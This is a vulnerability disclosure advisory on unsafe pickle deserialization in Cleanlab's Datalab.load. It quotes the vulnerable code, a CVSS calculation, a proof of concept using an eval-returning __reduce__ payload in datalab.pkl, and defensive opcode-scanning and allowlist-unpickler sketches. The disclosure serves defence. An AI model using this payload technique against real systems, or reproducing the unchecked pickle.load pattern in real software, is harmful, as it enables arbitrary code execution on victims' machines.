SAI Security Advisory

Unsafe deserialization in Datalab leads to arbitrary code execution

September 12, 2024

Products Impacted

This vulnerability exists in Cleanlab v2.4.0 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
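The score above can be reproduced from the vector. The following is a minimal sketch that assumes the vector follows CVSS v3.1 (the advisory does not state the version) and only handles Scope: Unchanged. The names WEIGHTS, roundup, and base_score are illustrative.

```python
import math

# CVSS v3.1 base metric weights (assumption: the vector above is v3.1).
# The PR weights listed here are the Scope: Unchanged values.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, as defined in the CVSS v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a Scope: Unchanged vector string."""
    metrics = dict(part.split(":") for part in vector.split("/"))
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))  # 7.8
```

The local attack vector and the required user interaction lower the exploitability term, which is why the score is High rather than Critical despite full impact on confidentiality, integrity, and availability.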

CWE Categorization

CWE-502: Deserialization of Untrusted Data

Details

To exploit this vulnerability, an attacker creates a directory containing a malicious file named datalab.pkl and sends that directory to a victim. When the victim loads the directory with Datalab.load, the vulnerable code is called. The vulnerability exists in the deserialize method of the _Serializer class in cleanlab/datalab/internal/serialize.py (shown below), which passes the file to pickle.load before any validation takes place.

    @classmethod
    def deserialize(cls, path: str, data: Optional[Dataset] = None) -> Datalab:
        """Deserializes the datalab object from disk."""

        if not os.path.exists(path):
            raise ValueError(f"No folder found at specified path: {path}")

        with open(os.path.join(path, OBJECT_FILENAME), "rb") as f:
            datalab: Datalab = pickle.load(f)

        cls._validate_version(datalab)

        # Load the issues from disk.
        issues_path = os.path.join(path, ISSUES_FILENAME)
        if not hasattr(datalab.data_issues, "issues") and os.path.exists(issues_path):
            datalab.data_issues.issues = pd.read_csv(issues_path)

        issue_summary_path = os.path.join(path, ISSUE_SUMMARY_FILENAME)
        if not hasattr(datalab.data_issues, "issue_summary") and os.path.exists(issue_summary_path):
            datalab.data_issues.issue_summary = pd.read_csv(issue_summary_path)

        if data is not None:
            if hash(data) != hash(datalab._data):
                raise ValueError(
                    "Data has been modified since Lab was saved. "
                    "Cannot load Lab with modified data."
                )

            if len(data) != len(datalab.labels):
                raise ValueError(
                    f"Length of data ({len(data)}) does not match length of labels ({len(datalab.labels)})"
                )

            datalab._data = Data(data, datalab.task, datalab.label_name)
            datalab.data = datalab._data._data

        return datalab

The above code is called by the Datalab.load function shown below.

    @staticmethod
    def load(path: str, data: Optional[Dataset] = None) -> "Datalab":
        """Loads Datalab object from a previously saved folder.

        Parameters
        ----------
        `path` :
            Path to the folder previously specified in ``Datalab.save()``.

        `data` :
            The dataset used to originally construct the Datalab.
            Remember the dataset is not saved as part of the Datalab,
            you must save/load the data separately.

        Returns
        -------
        `datalab` :
            A Datalab object that is identical to the one originally saved.
        """
        datalab = _Serializer.deserialize(path=path, data=data)
        load_message = f"Datalab loaded from folder: {path}"
        print(load_message)
        return datalab

When the user loads a directory containing the maliciously crafted pickle file, Datalab.load calls the _Serializer.deserialize class method, which opens the datalab.pkl file in that directory and passes it to pickle.load. An example attack is shown below. First, we create the exploit directory containing the malicious pickle file.

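import os
import pickle

class Exploit:
    def __reduce__(self):
        # pickle calls eval("print('pwned')") when this object is deserialized
        return (eval, ("print('pwned')",))

# Create the exploit directory, then write the malicious pickle into it
os.makedirs("./exploit", exist_ok=True)
with open("./exploit/datalab.pkl", "wb") as f:
    pickle.dump(Exploit(), f)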
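A payload of this kind can be examined without executing it. The sketch below uses the standard library's pickletools.genops to list opcodes that import a global or invoke a callable. The RISKY_OPCODES set and the risky_opcodes helper are illustrative names, not part of Cleanlab, and the payload is built in memory so that nothing is loaded.

```python
import pickle
import pickletools

# Opcodes that import a global or invoke a callable during unpickling.
RISKY_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}


def risky_opcodes(data: bytes) -> set:
    """Return the names of risky opcodes in a pickle, without loading it."""
    found = {opcode.name for opcode, _arg, _pos in pickletools.genops(data)}
    return found & RISKY_OPCODES


class Exploit:
    def __reduce__(self):
        return (eval, ("print('pwned')",))


# Serializing stores a reference to eval and its argument; it does not run eval.
payload = pickle.dumps(Exploit())
benign = pickle.dumps({"labels": [0, 1, 1]})

print(sorted(risky_opcodes(payload)))
print(sorted(risky_opcodes(benign)))
```

The payload reports REDUCE together with a global-import opcode, while the plain dictionary reports none. A legitimately saved Datalab pickle also contains these opcodes because it stores class instances, so a scan like this is a triage aid only; the imported names still have to be reviewed.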

Once the file has been created, the vulnerability can be exploited by having the user load the malicious directory:

from cleanlab import Datalab

Datalab.load("./exploit")

When the victim runs this code, the attacker's payload is executed on the victim's system with the privileges of the victim's Python process.
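One general hardening pattern for pickle-based loaders is to restrict which globals the unpickler may resolve, following the "Restricting Globals" approach in the Python pickle documentation. The sketch below is illustrative only: it is not Cleanlab's code or a vendor fix, and ALLOWED_GLOBALS, RestrictedUnpickler, and restricted_loads are hypothetical names. A real Datalab object would need a much larger allowlist.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical allowlist of (module, name) pairs the loader may import.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Deserialize data, refusing any global that is not on the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Exploit:
    def __reduce__(self):
        return (eval, ("print('pwned')",))


# An allowlisted type still round-trips.
print(restricted_loads(pickle.dumps(OrderedDict(a=1))))

# The exploit payload is rejected before eval can be resolved or called.
try:
    restricted_loads(pickle.dumps(Exploit()))
except pickle.UnpicklingError as exc:
    print(f"blocked: {exc}")
```

An allowlist narrows the attack surface but is only as safe as the callables it permits, so saved Datalab directories should still be loaded only from trusted sources.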

Timeline

July 11, 2024: Vendor disclosure via the process outlined on the vendor's security page

September 6, 2024: Followed up with the vendor to notify them of planned publication on September 12, 2024

September 12, 2024: Public disclosure

Project URL

https://cleanlab.ai/

https://github.com/cleanlab/cleanlab

Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer
